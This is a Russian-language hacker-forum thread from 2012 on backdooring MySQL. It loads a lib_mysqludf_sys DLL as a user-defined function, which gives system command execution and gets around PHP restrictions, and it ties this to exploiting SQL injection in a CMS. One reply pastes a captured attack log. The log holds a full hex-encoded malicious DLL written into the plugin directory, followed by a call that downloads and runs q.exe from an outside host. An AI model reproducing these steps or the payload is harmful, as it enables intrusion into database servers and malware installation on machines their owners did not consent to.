Бэкдорим Мускул, или выполнение системных команд.

Discussion in 'Video.Antichat' started by nikp, 18 Mar 2012.

  1. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Бэкдорим Мускул, или выполнение системных команд.

    http://depositfiles.com/files/7ssja9v37

    На видео показано выполнение системных команд из MySql, используя UDF (User Defined Function).
    Про добавление новой, определяемой пользователем функции описано тут.
    http://www.mysql.ru/docs/man/Adding_UDF.html

    Коротко,
    функции должны быть написаны на C или на C++, а операционная система должна поддерживать динамическую загрузку.
    Файлы, реализующие UDFы, должны компилироваться и устанавливаться на машине, где работает сервер, в каталог,
    где MySql может его прочитать.
    Под виндой мускул воспринял новый файл без перезагрузки.

    После установки библиотеки, новая функция инициализируется командой:
    Code:
    CREATE FUNCTION name_function RETURNS STRING SONAME "name_udf_lib.so";
    Все, можно пользоваться name_function(), так же как и встроенной.

    Для удаления функции используем команду
    Code:
    DROP FUNCTION name_function;
    Существуют готовые библиотеки, самые известные находятся здесь
    http://www.mysqludf.org/
    нас интересует эта
    http://www.mysqludf.org/lib_mysqludf_sys/
    в ее составе
    lib_mysqludf_sys_info() - для вывода информации о текущей версии
    sys_eval — выполняет переданную команду и возвращает её вывод
    sys_exec — выполняет переданную команду и возвращает её код возврата
    sys_get — получает значение переменной окружения
    sys_set — создает переменную окружения и устанавливает/обновляет её значение


    к сожалению на сайте, для виндов выложена левая библиотека, но рабочая нашлась по адресу
    для 32b
    http://www.assembla.com/code/amuccitesi/subversion/nodes/plugin/windows/lib_mysqludf_sys.dll?rev=3

    для 64b (эту не проверял)
    https://sites.google.com/site/xedocfiles/files/lib_mysqludf_sys.zip?attredirects=0&d=1

    В видео показано:
    смотрим, откуда мускул подгружает библиотеки
    Code:
    show variables like 'plugin_dir';
    и в этот каталог льем файл lib_mysqludf_sys.dll

    создаем UDF
    Code:
    CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
    
    Code:
    select * from mysql.func
    покажет все пользовательские функции

    проверяем работу
    Code:
    select sys_eval('dir');
    дает вывод каталога @@basedir

    Собственно все...

    Ну проверяем работу забэкдорив СМСку (под руками была DLE v9.4).
    Пакостим слегка, в скрипте убираем фильтрацию переменной и эксплуатируем SQLi.

    Дополнительный бонус метода, даже если включат в PHP
    disable_functions
    open_basedir
    safe_mode
    выполнение команд через мускул не страдает.

    PS
    Под nix снять уже не успеваю, до следующего раза.
     
    12 people like this.
  2. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    140
    Likes Received:
    13
    Reputations:
    0
    А линка на либу для никсов нет?
    ---
    Нашел
     
    #2 Mr.Snuffer, 18 Mar 2012
    Last edited: 18 Mar 2012
  3. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Никто не может залить на ютуб?
     
    _________________________
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    залей и выложи если не трудно)

    вот держите youtube
     
    1 person likes this.
  5. Андрей021

    Андрей021 New Member

    Joined:
    3 Aug 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    1
    Можно исходник dll получить?
     
  6. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
  7. GizmoSB

    GizmoSB New Member

    Joined:
    14 Feb 2010
    Messages:
    75
    Likes Received:
    2
    Reputations:
    0
    выложите пожалуйста либу для никсов )спасибо
     
  8. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    395
    Likes Received:
    79
    Reputations:
    16
  9. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Как забэкдорить мускул если есть только папка /usr/lib64/mysql/ , хотя
    Code:
    show variables like 'plugin_dir';
    показывает /usr/lib64/mysql/plugin. И темболее в /usr/lib64/mysql/ нету прав на запись...
     
  10. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Вариант, без поднятия прав, пока не найден.
     
  11. Cecil B Demented

    Cecil B Demented New Member

    Joined:
    13 Nov 2006
    Messages:
    19
    Likes Received:
    4
    Reputations:
    5
    Вот китайский метод:

    Code:
    W:\modules\database\MySQL-5.5.25\bin\mysqld.exe, Version: 5.5.25-log (MySQL Community Server (GPL)). started with:
    TCP Port: 3306, Named Pipe: (null)
    Time                 Id Command    Argument
    120810 18:47:14	    1 Connect	[email protected] on mysql
    		    1 Quit	
    120810 17:54:39	    3 Connect	[email protected] on mysql
    120810 17:54:40	    3 Query	set autocommit=0
    		    3 Quit	
    120810 17:54:41	    4 Connect	[email protected] on mysql
    		    4 Query	set autocommit=0
    120810 17:54:43	    4 Query	SELECT VERSION()
    120810 17:54:44	    4 Query	set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000EF55A8C1AB34C692AB34C692AB34C692C42BCC92AF34C692C42BC292A934C692AB34C692A834C692AB34C792B834C692C92BD592AC34C6929D12CD92A934C6925414C292AA34C69252696368AB34C692000000000000000000000000000000000000000000000000504500004C0103000E6DFF4F0000000000000000E0000E210B01060000100000001000000050000020660000006000000070000000000010001000000002000004000000000000000400000000000000008000000010000000000000020000000000100000100000000010000010000000000000100000006C71000070000000007000006C010000000000000000000000000000000000000000000000000000DC7100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000500000001000000000000000040000000000000000000000000000800000E0555058310000000000100000006000000008000000040000000000000000000000000000400000E05550583200000000001000000070000000020000000C0000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303400555058210D0902081292E561117752FFF14200001406000000500000260100C02F775FFE8B4C2408B801003BC8750A0C04890D21D8C2FCF676EC0C0090008B4412C7400813100432C0C3EE6FDFBE81EC34020C5355568D1810575033F6682E6E77FBDD906813808974241CC71528044DFF15315DB7BDFD0085C075208D531C8D542B515C183428D8EDD8EF52505633845123048B1B14520ADC5DFBEE08B9660033C08D7C244B20F3AB2ED375DDFF3F2850516A01565A383774073C5BB77B4D5C44B80750007FE80C03FB7BEBBA524D2835182F506A03663C568912768FFD6F2C1B4C8BAC244C0260942440398B1DFFFF7FEF74108B4D0827208B790483C9FFF2AEF7D12BF98BC18BF78BFA63DFFFFFC1E902F3A58BC883E103F3A4FFD38D8C24AC6D840694DBBB3F7303C01483BC24BC0D0275558B1BB0EEDEFD3783E804743E48740E48F6487543BF5D14EB41FF5E83E91CB4120B17150CEB2B83EFDDCFD8F802250704EB1B0620FCEB1413D6DC217F0AF0EB09E89DBA9F58B0367B6A00A107A3C1ED6B77B1A8CE8B115218F1586CEF164CF70F85D500E93513062620A8FFD6CAC9EDDD8B3D0E1C68102715FFD7886CD662C10F4AEE1406EFFFB16F840470EC3C8BF083C40885F674165614C2DBD8916C38560634190C8DBC599F139E2CAA83C177E6308BB4E11BB608802704D44889460C5154FBD8EF83C352514D40502A2C8B7E0C40750BDB162714438BAB54335F7FFCD6B84B49899F325E5D5B81C482C38B45DE2C65BB08268B386965703E4343C0691752186710422E994084080B3F256C90000F8B400C5974EB4ED8B30846405921FF25134C05B8A11B1948543108F50E39052FECBE6F59DC7E2EFF0D078B051024FE018B09CB21FD4871E0753F6880383059BEF7B7BBA314E875049EEB66832000A10DBC041FBBE1FB04001CE4E204A6FF555959EB3D6AAF8B756339269B305E21E3D8FF5FA471FC3BF072128B0E85C97407FFD11E83EE672DFD1D6CEABB83251100595E2F5885FFDF30F2C1EC538B5D08568B750C578B7D10E76DB4FFF77509833D5F00EB2683FE01740504E62287E97EF364EC09575653FFD0080C6FDDFDFBDC5E82B04E0FA3FBFFFF3389450CDF60ADAE4C17372B23F64603BBDD0ED8752634032125837D7F74115BFBD6450E083C8B025F5E5B5D9C88223B824D280000DF2E7FA877726F6E672E6F6B0328257329DBCBF6FF20706F72746E756D626572200F646F73760A7304D8FBB66925201E002728FFFFADB9002B03633A5C57696E646F77735C76332E6C6F6BBFE4BB6717612B62004374656D70040384BD6F7F3230395C6D61142E657865371F9574FFFE6973657475701A202D6F223D77DAB7EDDB221A70616263057963556E6B6E1E6CF7DEDE07546F6F2F6C64218F50585007EE6F83FC32303033302368652D6E65770BF7BF05B2387737410064006D0069006E03AFB9AE7D7300740072C9056F070D006EEC7FB2611F6C0076003100320033177013A4E1CC6D2365252750394EFDFF0B4159595354454D5C43757272656E74436FED60DBB60372AE53735C0A5C5425FE19B6B76D90616C201472609D5374617400B4BF1967A15244502D5463A4C8561484230CB2398A0AB01010806DF9FF0144656C65746546696C6541470A566DBBDD91BC45780E57690765630853FB9F66BB1D657034BD0052656743726561376BDF8E7D4B6579410E5175377956616C063969B6F717206C6F731F36CA24E0CDFDFF5F61646A7573745F666469760D5D697474DB6E6F0DD60A7370720C7466086D41F7EEED5A367066633D077075747306D36C9B796F70656E73654ED548B5B16FDB4EAD5524724164640B4C386B0276BF3D47726F7570114D6557732D5BFB9F66E25455524C446F776E578454FDFF63B36FEF00172F171D070B260827200839251610FFFFFFBF0A0B212007080E0E070705060F06071D24073F2207471406060E08060B0DEDFFAD6D180500060A150C0622125C1C005045416F8351FF4C0104000E6DFF4F43E00D210B019C7D7684062A0030130D14000F20969D278F10001004000717A40BD650272A02029AEDD9B207067022076E5CF2818CEA4F78DC4000008406922E40575C2E5BF67417B87874B8B0100342CFB6F121602E72642661CCDE2062876C0903A2402E26940CD2DC27F001303036D91CDBC04F652010BC27657353724042043E210000B8870AE5480412000000FF000000000000000000000000807C2408010F85B901000060BE006000108DBE00B0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9070000008A07472CE83C0177F7803F0175F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE004000008B0709C0743C8B5F048D84300060000001F35083C708FF9678600000958A074708C074DC89F95748F2AE55FF967C60000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE806000008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E924ACFFFF0000000000000000000000000000000000000000000000000000000000000000000000B070000078700000000000000000000000000000BD70000090700000000000000000000000000000CA70000098700000000000000000000000000000D5700000A0700000000000000000000000000000E2700000A87000000000000000000000000000000000000000000000EC700000FA7000000A7100001A7100002871000000000000367100000000000044710000000000004A7100000000000056710000000000004B45524E454C33322E444C4C0041445641504933322E646C6C004D53564352542E646C6C004E455441504933322E646C6C0075726C6D6F6E2E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000526567436C6F73654B65790000006672656500004E657455736572416464000055524C446F776E6C6F6164546F46696C65410000000000000E6DFF4F00000000B271000001000000030000000300000094710000A0710000AC710000301000003013000020100000BC710000C2710000CF7100000000010002006D7973716C2E646C6C007870646C33007870646C335F6465696E6974007870646C335F696E6974000000006000000C0000002D360000000000000000000000000000000000000000000000000000)
    		    4 Query	use mysql
    		    4 Query	drop table IF EXISTS yongger2
    		    4 Query	SHOW WARNINGS
    		    4 Query	create table yongger2(data LONGBLOB)
    120810 17:54:45	    4 Query	insert into yongger2 values("")
    120810 17:54:53	    4 Query	update yongger2 set data = @a
    120810 17:54:54	    4 Query	set @dir2 = concat('select data from yongger2 into DUMPFILE "',@@plugin_dir,'\\cna12.dll"')
    		    4 Query	set @dir2 = replace(@dir2,'\\','\\\\')
    		    4 Query	set @dir2 = replace(@dir2,"/","\\\\")
    		    4 Query	prepare sql3 from @dir2
    		    4 Prepare	select data from yongger2 into DUMPFILE "W:\\modules\\database\\MySQL-5.5.25\\lib\\plugin\\\\cna12.dll"
    		    4 Query	execute sql3
    120810 17:54:55	    4 Query	select data from yongger2 into DUMPFILE '..\\bin\\cna12.dll'
    		    4 Query	drop table IF EXISTS yongger2
    		    4 Query	drop FUNCTION xpdl3
    		    4 Query	CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
    120810 17:54:56	    4 Query	select xpdl3('http://vm.gnway.net:81/q.exe','c:\\isetup.exe')
    120810 17:55:20	    4 Query	drop FUNCTION xpdl3
    		    4 Query	drop FUNCTION IF EXISTS xpdl3
    		    4 Query	SHOW WARNINGS
    120810 17:55:21	    4 Query	commit
    		    4 Quit
    
    Ток непонял червь это делал или сам китаёза, на той стороне похеканый дедик.
     
    #11 Cecil B Demented, 13 Aug 2012
    Last edited: 13 Aug 2012
    1 person likes this.
  12. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Вещь хорошая, но права не сильно радуют) Разве что в связке с суидником каким нибудь.
    Code:
    mysql> select sys_eval('id');
    +--------------------------------------------------+
    | sys_eval('id')                                   |
    +--------------------------------------------------+
    | uid=104(mysql) gid=107(mysql) groups=107(mysql)
     |
    +--------------------------------------------------+
     
    1 person likes this.